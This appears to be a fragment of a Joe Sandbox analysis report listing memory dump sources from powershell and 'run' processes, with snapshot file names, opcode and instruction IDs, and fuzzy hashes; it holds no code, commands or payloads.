                                                    • Source File: 00000004.00000002.1883975003.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_4d20000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2054bbd6b09e06599bc0f2a44704392281270cd07049673e84c60f0d7453efba
                                                    • Instruction ID: 0ffb633306b3acc0c4f394a3b51f700491f937c82033a80209b8a5c220f77c11
                                                    • Opcode Fuzzy Hash: 2054bbd6b09e06599bc0f2a44704392281270cd07049673e84c60f0d7453efba
                                                    • Instruction Fuzzy Hash: C4419D3180E3E04FD7039B6CC9A47D97F70AF42318F0941E7D4988B1A3D669988AC7A6
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1883975003.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_4d20000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 61eb913568e69479dfb26c87f20c2a9045b18f0ad2a5e09d0a072020b4982266
                                                    • Instruction ID: e70cc25ea9599848e2c16ced6149f396489088f693d44d2ab783563283a980ac
                                                    • Opcode Fuzzy Hash: 61eb913568e69479dfb26c87f20c2a9045b18f0ad2a5e09d0a072020b4982266
                                                    • Instruction Fuzzy Hash: C84139B4A005158FCB05CF58C598AAAFBB1FF48314F258599E915AB368C736FC51CF90
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1889209588.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7750000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f436901d2b5a0098a246b9c49015b5a25515d162d3878dafa3a2d34fc07692c2
                                                    • Instruction ID: 5826ce1dfd711dd178c9a9e06e83e1187b274611650abc6b279790d8fbe9cbc8
                                                    • Opcode Fuzzy Hash: f436901d2b5a0098a246b9c49015b5a25515d162d3878dafa3a2d34fc07692c2
                                                    • Instruction Fuzzy Hash: 7B21B6B5109385DFC7224B64C594761BBB5EF423A1F5984A7DC488F193C3B6CC86C792
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1883975003.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_4d20000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0ab7997aa2ae5dc5d36996a97ad38b925c9149d75f6a97f19f0943020bddb6fa
                                                    • Instruction ID: 158ab8beb11489e191aaa21866043ed2ba1dc559c81c78239b01bb5edb76c7ce
                                                    • Opcode Fuzzy Hash: 0ab7997aa2ae5dc5d36996a97ad38b925c9149d75f6a97f19f0943020bddb6fa
                                                    • Instruction Fuzzy Hash: 69310874A005159FCB14CF89D5949AEF7F2FF48314B248699E519A7355C732FC81CB90
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1883975003.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_4d20000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0562613bc0149b36d474402493e435700e815729ccd9e0af4226157e7675ad8d
                                                    • Instruction ID: 0c203af970e005a5dc9ce13340682a8c44c416a1a49c176c4871e63b455dd454
                                                    • Opcode Fuzzy Hash: 0562613bc0149b36d474402493e435700e815729ccd9e0af4226157e7675ad8d
                                                    • Instruction Fuzzy Hash: FA11E379A00218DFCB04CFA8D69099CBBF2FF4C324F1581A9E904AB366D731A945CF60
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1883975003.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_4d20000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c59a4ec104522e73c6e9646a881c4565e9ccb0e2b1d58db3d095f3b6de3f987d
                                                    • Instruction ID: 40d067f705dcac05ad7449d005b5324dc9c8f0075c86157fd0dfb459523bfd2b
                                                    • Opcode Fuzzy Hash: c59a4ec104522e73c6e9646a881c4565e9ccb0e2b1d58db3d095f3b6de3f987d
                                                    • Instruction Fuzzy Hash: 51111C34A00219EFDB01CF98D594E9DFBB2FF48314F288558E405AB361C771E985CB40
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1883975003.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_4d20000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5337003fa83f6e51e0dd4e9a653f70843c8e0239beee2b1f6c1302a3a908cd07
                                                    • Instruction ID: 65fff8e6354d99f3407f20cf5cf8d6755540b35770bf2e4b43022e802f98d738
                                                    • Opcode Fuzzy Hash: 5337003fa83f6e51e0dd4e9a653f70843c8e0239beee2b1f6c1302a3a908cd07
                                                    • Instruction Fuzzy Hash: BB117975A093868FCB42CB78C851A99BFB0EF0A214F1002DAD545DB3A2D2319945CB92
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1883582156.0000000004B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B9D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_4b9d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8188860f602b944532f604e4cf0bd2ec4f1da230ce5d3f978de701446eed11b2
                                                    • Instruction ID: 565ee6941647ceb1f754276f189fc90fc1e2469f272c28c88167c43c7bf36081
                                                    • Opcode Fuzzy Hash: 8188860f602b944532f604e4cf0bd2ec4f1da230ce5d3f978de701446eed11b2
                                                    • Instruction Fuzzy Hash: 91018471508344AAEB104F36DD94767BFDCEF41324F18C5B9ED484A146D679AC41C6B1
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1889209588.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7750000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 74c38b7b3093626135602584696a8d1443f4c2faf370b9e105e1195af85b423a
                                                    • Instruction ID: 4fb5a04c8d2c23115ca532a39e658dbfca45fa2e0b59414ca1b5069d21f9dfde
                                                    • Opcode Fuzzy Hash: 74c38b7b3093626135602584696a8d1443f4c2faf370b9e105e1195af85b423a
                                                    • Instruction Fuzzy Hash: B1F028F220E3854FC32A472468102A77FB6FFD311572948ABD900CF297D6B15882C3A2
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1883582156.0000000004B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B9D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_4b9d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 112be4cb776c9463491fdc6455a9713b1b5739c965994b1f81f7982b5d8368e0
                                                    • Instruction ID: 6ef825efe18ab6a4624aec3dc20f7bdb06a92a0be26148629219bc45166ce13d
                                                    • Opcode Fuzzy Hash: 112be4cb776c9463491fdc6455a9713b1b5739c965994b1f81f7982b5d8368e0
                                                    • Instruction Fuzzy Hash: 4A01927100D3C05FD7124B258CA4752BFB8DF52224F08C4DBDD888F193C2699844C772
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1889209588.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7750000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2ba707af5142d17136f2dfeee97c6d8311117e5b8230ecfe609aba6aa7107922
                                                    • Instruction ID: 5bd5457ac97f0413aaf6555949d9901ed332bd28a1ad8dc3dc3d3d7c2d54d049
                                                    • Opcode Fuzzy Hash: 2ba707af5142d17136f2dfeee97c6d8311117e5b8230ecfe609aba6aa7107922
                                                    • Instruction Fuzzy Hash: 48F028F06087D55FC3222B785C252A63F75CF436783180BABD5E1CF6E3C65268068392
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1883975003.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_4d20000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 42567c3c2f1628463005e0c33c8dbdd810e33adb498a64da38fe1c84f8b9abf8
                                                    • Instruction ID: 9a2065c05c3ad579cb99127701e70a2008c6ea2682d472cf2d64917eafdb439f
                                                    • Opcode Fuzzy Hash: 42567c3c2f1628463005e0c33c8dbdd810e33adb498a64da38fe1c84f8b9abf8
                                                    • Instruction Fuzzy Hash: 870137B4E0425A8FC741CF68D4909AABFF0FF4A220F1152DAE549DB372D331A981CB91
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1883975003.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_4d20000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: efe50179a183dbc24587c6d960a575c52aba715ce3c1bcc2ad9e31e9159824eb
                                                    • Instruction ID: 233e491d75345de2438762a58cbb719418b64b880dcde1379af3f7b3708fa659
                                                    • Opcode Fuzzy Hash: efe50179a183dbc24587c6d960a575c52aba715ce3c1bcc2ad9e31e9159824eb
                                                    • Instruction Fuzzy Hash: F7F09774E0020A8FC780DF68C585AAEBBF0FF49214F5051A9D509DB325E731A945CB91
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1889209588.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7750000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e1ec38cb0949de8e5fed5330df430596e1359102e99a94415f2e93dc70f3a2dc
                                                    • Instruction ID: 699b7fb24edbeaa1322fc21c55a6b43d18e2e0edd0c99cacaead3086c7e81dc4
                                                    • Opcode Fuzzy Hash: e1ec38cb0949de8e5fed5330df430596e1359102e99a94415f2e93dc70f3a2dc
                                                    • Instruction Fuzzy Hash: 44E092707007246FC6307BBD9C0A65B7A65EF41B747200B2CE1B29BBE1CB62A80187D1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1889209588.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7750000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                    • API String ID: 0-1608119003
                                                    • Opcode ID: ddd8aef4290d7684f8eda779b37ef3f053fdd46e1718606f913b1a154ff10a2f
                                                    • Instruction ID: 7946d6b7ea4f6623e674dc6fb7c953d1d2742fcc98474712e2190842ce6538c6
                                                    • Opcode Fuzzy Hash: ddd8aef4290d7684f8eda779b37ef3f053fdd46e1718606f913b1a154ff10a2f
                                                    • Instruction Fuzzy Hash: 1EE14CB17043559FC7168B789810A6ABFB1EFC6698F1488ABD905CF372CA72CC45C3A1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1889209588.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7750000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: tP^q$tP^q$$^q$$^q$$^q
                                                    • API String ID: 0-578306960
                                                    • Opcode ID: 821597c3ff1da7aee08ebc62c925053461db56f27d9aac8570c22031b4fa7b01
                                                    • Instruction ID: 1892423e2ede278db64b045277aec4f42b5d4033f978c3369361db9aee8fc01b
                                                    • Opcode Fuzzy Hash: 821597c3ff1da7aee08ebc62c925053461db56f27d9aac8570c22031b4fa7b01
                                                    • Instruction Fuzzy Hash: 7E9158B1B083459FC7218B79980066ABFA1FFC6660F1884ABD944DB363DA71DC45C3A1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1889209588.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7750000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: tP^q$$^q$$^q$$^q$$^q
                                                    • API String ID: 0-324510305
                                                    • Opcode ID: 92c338595ae1df45d0524e47cafc5877bb9cfeff048664526abe14595323c0dd
                                                    • Instruction ID: e50b7048207681202ab6b5448acb7e645a153680329e69e77b70a27dfe8f590b
                                                    • Opcode Fuzzy Hash: 92c338595ae1df45d0524e47cafc5877bb9cfeff048664526abe14595323c0dd
                                                    • Instruction Fuzzy Hash: CF3136F5A00346AFDB248F64C8409367FF6AF42690F19499AEC00DF252CAB1DC54C761
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1889209588.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7750000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: tP^q$tP^q$$^q$$^q
                                                    • API String ID: 0-263804196
                                                    • Opcode ID: 538c8b9d9ddcb65d65f3eaaf119afc3c59aac00b855c51d23406356297ae2f4b
                                                    • Instruction ID: 8982a38ebca2c4127f8079e8656980fd95e74193703f298041cc9fd7574cb95b
                                                    • Opcode Fuzzy Hash: 538c8b9d9ddcb65d65f3eaaf119afc3c59aac00b855c51d23406356297ae2f4b
                                                    • Instruction Fuzzy Hash: 1E813A75B002549FD7249B69C804B7ABBE2EFC5B10F54C46AE809DF351CA72DC45C791
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1889209588.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7750000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $^q$$^q$$^q$$^q
                                                    • API String ID: 0-2125118731
                                                    • Opcode ID: 40fa6f63d308cd5d85dbc4c391c7a1ed3c4ccc4846f17f2f0f903c6be1ed1736
                                                    • Instruction ID: c571caa505c193e1373d1dfd5d35e94fee4a3dd9a6a239baa8f32f46939b17ac
                                                    • Opcode Fuzzy Hash: 40fa6f63d308cd5d85dbc4c391c7a1ed3c4ccc4846f17f2f0f903c6be1ed1736
                                                    • Instruction Fuzzy Hash: EE313CF560C3891FC72253281C245A67FA1EFC259471D0A9BD841DF6ABCD568C8A8396
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1889209588.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7750000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'^q$4'^q$$^q$$^q
                                                    • API String ID: 0-2049395529
                                                    • Opcode ID: c7559492f6548aa0c842f841321f7fa29f7058ab2bd1d1a0c69bdc21a23c10bc
                                                    • Instruction ID: bd294ab47af15d86fae08f3278587a45717659064e0772c9727f3173391e98b7
                                                    • Opcode Fuzzy Hash: c7559492f6548aa0c842f841321f7fa29f7058ab2bd1d1a0c69bdc21a23c10bc
                                                    • Instruction Fuzzy Hash: F701F771B0938A5FC32F573858245656FB69FC3A9072908DBC485CF25BCC66DC8AC3A2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1889209588.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7750000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'^q$4'^q$$^q$$^q
                                                    • API String ID: 0-2049395529
                                                    • Opcode ID: a66abd839cddd0635c7db278b28b4dec75616d2d0ceb6826d541146373180cc8
                                                    • Instruction ID: 27d360aa10faa881f01f2823d87cff7f0e186060688ea2c16fe1f1670fece0ca
                                                    • Opcode Fuzzy Hash: a66abd839cddd0635c7db278b28b4dec75616d2d0ceb6826d541146373180cc8
                                                    • Instruction Fuzzy Hash: 8401D461B0D7C95FD32B172818206A66FF29FD799071A089BC448CF357CD664C4D83A3
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.1905734276.00007FF63D271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63D270000, based on PE: true
                                                    • Associated: 00000008.00000002.1905438887.00007FF63D270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000008.00000002.1906331885.00007FF63D58E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000008.00000002.1906356391.00007FF63D58F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000008.00000002.1906356391.00007FF63D68E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000008.00000002.1906513172.00007FF63D6D7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000008.00000002.1906537066.00007FF63D6D8000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000008.00000002.1906559835.00007FF63D6DC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7ff63d270000_run.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3414cada1574162cf82e41b3d68a30d92ad2cffa160ba48225f91e421ef25120
                                                    • Instruction ID: 006299c53215bff8ad1bc477d2ae7bcec6ef7ee17d5cf79000766ded7e282feb
                                                    • Opcode Fuzzy Hash: 3414cada1574162cf82e41b3d68a30d92ad2cffa160ba48225f91e421ef25120
                                                    • Instruction Fuzzy Hash: BAB01220D0860D95E3012F81D84231C23606F457C1FA05030C50C47392DF3C5010A710